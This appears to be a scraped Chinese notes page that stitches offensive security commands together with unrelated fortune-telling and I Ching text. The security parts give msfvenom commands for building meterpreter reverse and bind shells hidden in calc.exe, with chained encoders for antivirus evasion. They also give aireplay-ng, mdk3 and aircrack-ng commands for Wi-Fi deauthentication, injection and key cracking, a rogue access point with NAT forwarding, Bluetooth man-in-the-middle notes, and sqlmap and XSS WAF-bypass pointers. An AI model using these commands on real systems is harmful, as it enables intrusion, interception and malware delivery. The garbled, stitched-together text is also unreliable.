Metasploit自动化
http://www.s3cur1ty.de/
/opt/metasploit/apps/pro/msf3/scripts/resource/.rc
/usr/share/metasploit-framework/scripts/resource/.rc
http://www.s3cur1ty.de/
/opt/metasploit/apps/pro/msf3/scripts/resource/.rc
/usr/share/metasploit-framework/scripts/resource/.rc
文章摘要
/usr/share/metasploit-framework/tools
cat payload_file.bin | ./msfvenom -p - -a x86 –platform win -e x86/shikata_ga_nai -f raw
msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > new.exe
PAYLOAD windows/meterpreter/reverse_tcp
$MSFVENOM -p “$PAYLOAD” LHOST=”$IP” LPORT=”$PORT” EXITFUNC=thread -f raw |
$MSFVENOM -e x86/shikata_ga_nai -i $ITER -f raw 2>/dev/null |
$MSFVENOM -e x86/jmp_call_additive -i $ITER -a x86 –platform linux -f raw 2>/dev/null |
$MSFVENOM -e x86/call4_dword_xor -i $ITER -a x86 –platform win -f raw 2>/dev/null |
$MSFVENOM -e x86/shikata_ga_nai -i $ITER -a x86 –platform win -f c > msf.c 2>/dev/null
github/metasploitavevasion
airbase-ng -E “ssids-file” -w “wep-key” wlan0mon
|
|
mdk3 wlan0mon b
mdk3 wlan0mon d
iwconfig wlan1 txpower 33
mdk3 wlan0mon a -a 11:11:22:44:dd:00
aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1
aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 ath1
aireplay-ng -0 1 -a 00:00:00:00:00:00 -c BB:BB:BB:BB:BB:BB ath1
aireplay-ng -3 -b
aircrack-ng -x -f 2 .cap
aircrack-ng -w passdict.txt .cap
aircrack-ng -n 64 -b apmac .ivs
aircrack-ng -w passdict.txt -b 00:00:00:00:00:00 .cap
然后可以试着用手机连接,应该可以连上但上不了网
iptables –t nat –A POSTROUTING –out-interface eth0 –j MASQUERADE命令并回车,设置iptables转发,将所有数据转发到eth0网卡;
于是配置NAT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE #对eth0进行源nat
iptables -A FORWARD -i wlan0mon -o eth0 -j ACCEPT #把无线网卡流量转发到有线网卡(或者什么能上网的网卡)上面
iptables -A FORWARD -p tcp –syn -s 192.168.0.0/24 -j TCPMSS –set-mss 1356
四柱五行生克中对应需补的脏腑和部位
木: 肝与胆互为脏腑表里, 又属筋骨和四肢. 过旺或过衰, 较宜患肝, 胆,头, 颈, 四肢,关节, 筋脉, 眼,神经等方面的疾病.
火:心脏与小肠互为脏腑表里, 又属血脉及整个循环系统. 过旺或过衰, 较宜患小肠, 心脏, 肩, 血液, 经血, 脸部, 牙齿,腹部, 舌部等方面的疾病.
土: 脾与胃互为脏腑表里, 又属肠及整个消化系统. 过旺或过衰, 较宜患脾, 胃, 肋, 背, 胸, 肺, 肚等方面的疾病.
金: 肺与大肠互为脏腑表里, 又属气管及整个呼吸系统. 过旺或过衰, 较宜患大肠, 肺, 脐,咳痰, 肝, 皮肤,痔疮, 鼻气管等方面的疾病.
水: 肾与膀胱互为脏腑表里, 又属脑与泌尿系统. 过旺或过衰, 较宜患肾,膀胱, 胫, 足, 头, 肝, 泌尿, 阴部, 腰部, 耳,子宫,疝气等方面的疾病.
文章摘要
bluetooth sniffer /bluetooth pin linkkey cracker/ blueSoleil
python /usr/local/bin/bluez_simple_agent_nouser hci0 02:11:0F:19:15:57 02:11:0F:19:15:57
btproxy->mitm.py.restart_bluetoothd()->adapter.py._run(cmd)
注销掉代码mitmpy.restart_bluetoothd()
dbus.exceptions.DBusException: org.freedesktop.DBus.Error.UnknownMethod: Method “FindAdapter” with signature “s” on interface “org.bluez.Manager” doesn’t exist
bluez_simple_agent_nouser nu 110 “org.bluez.Manager”
mitm.setup_adapters
主/从设备都会使用蓝牙协议,直到主设备发出请求,从属设备通常保持待机状态。并且主设备可以连接到多台设备,而从属设备仅仅智能连接一台设备。
代理会搜寻设备名称和类,所以其可以将设备名称和类复制到使用的蓝牙适配器中。在本例中,因为只有一个蓝牙适配器,所以只会复制从属设备的属性。
btproxy F4:8B:32:BA:0F:78 04:18:0F:19:35:57
文章摘要 文章摘要
Usage: sqlmapapi.py [options]
Options:
-h, –help show this help message and exit
-s, –server Act as a REST-JSON API server
-c, –client Act as a REST-JSON API client
-H HOST, –host=HOST Host of the REST-JSON API server
-p PORT, –port=PORT Port of the the REST-JSON API server
工控系统多种协议:
MODBUS\PROFIBUS\DNP3\ICCP
乾坤屯蒙需讼师, 比小畜兮履泰否, 同人大有谦豫随, 蛊临观兮噬嗑贲,
剥复无妄大畜颐, 大过坎离三十备。咸恒遁兮及大壮, 晋与明夷家人睽,
蹇解损益夬姤萃, 升困井革鼎震继, 艮渐归妹丰旅巽, 兑涣节兮中孚至,
小过既济兼未济, 是为下经三十四。
文章摘要
Collusion https://www.mozilla.org/en-US/lightbeam
XSS现代WAF规则探测及绕过技术
[via@freebuf] 原作者:RAFAY BALOCH,TANZIL JAFFERY
BlackHat Python